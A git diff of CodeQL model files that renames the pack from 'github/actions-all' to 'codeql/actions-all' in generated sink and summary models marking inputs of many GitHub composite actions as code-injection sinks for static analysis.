@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index 52a2001db13..726aab85e84 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 28d8cabc368..4325315c595 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index f3ef4917146..11da4a45708 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 6150422d177..4064d556702 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index ad99ed2b432..c8d29fbe9f9 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 5df1a5f2230..5be8efeee39 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index b2c5857a743..4b4e290a9cb 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 93996601c8a..6f56ef896d3 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index c1d90d6ab0a..1520e1fa3b1 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index d29d4d5674d..2d0a5e4f6d6 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 0aaacca4805..c4224e60057 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index b69a7740079..b452fb2ebd5 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 6ab3f7d2bf5..e75842caa3f 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index f5ce35d96ad..53a35fdd9d9 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 519adffb097..ca216f3b091 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 69d0355d720..25107038af5 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 97a69439375..04132df42bf 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index 54e557061df..ca7d52c45a9 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 12ed97f6af5..3e42add8650 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 2c64a6978af..c0b4d00d5e5 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index f7982d2244a..505790a2c9a 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 9678f320425..ebb4ebff5e3 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 2ee43fbcf6c..fcac2d1554d 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index 2560e80f52c..a4fc1bd993d 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 17e4f893d39..6831b4406bc 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index dde14bfa277..c669f9be2f8 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 0aabf2e1d7f..ef7bf632aee 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 6fdfb2e6eba..1aa3eedfe89 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index b068e810823..aa9670d3de3 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9107fd9e85c..79cc879fa67 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index ee81ae11045..f8964efbc56 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index a8030627789..102d0aa85e5 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index a89b000bedf..c1743b69eb2 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index a98ea12496f..47a1811b49f 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index 8475ef34240..9941f981d75 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index fff5eaab1f4..eac3e751bde 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 5d0cef62b0b..3c613a4eb88 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 3edfa5ef14d..b846058b3f0 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index d5f640e91a5..7337d8896f3 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 32945cb21e3..3c6675a13c9 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 42eeca98de4..9f0f612d1a6 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index 5c0777ce394..9e5715f2638 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index ac777af0285..02fe0539869 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 26a587e4f5c..86be8acfeea 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index a26ebcfa57d..fff292f42bb 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index bf39b24e841..141c52a8ccd 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 00cb4906bb5..a073f87d945 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 85f583a5e88..5e10745332b 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index 207b5705e51..e278f0849bf 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index f0f3be91b4b..45598fe4bc7 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 04e779b9579..f1689c52029 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 7939469934e..00ae4bfb9b8 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index 1af5c9435af..1bd2cf92418 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index bcb9dc853d6..2dc89f564f5 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file 
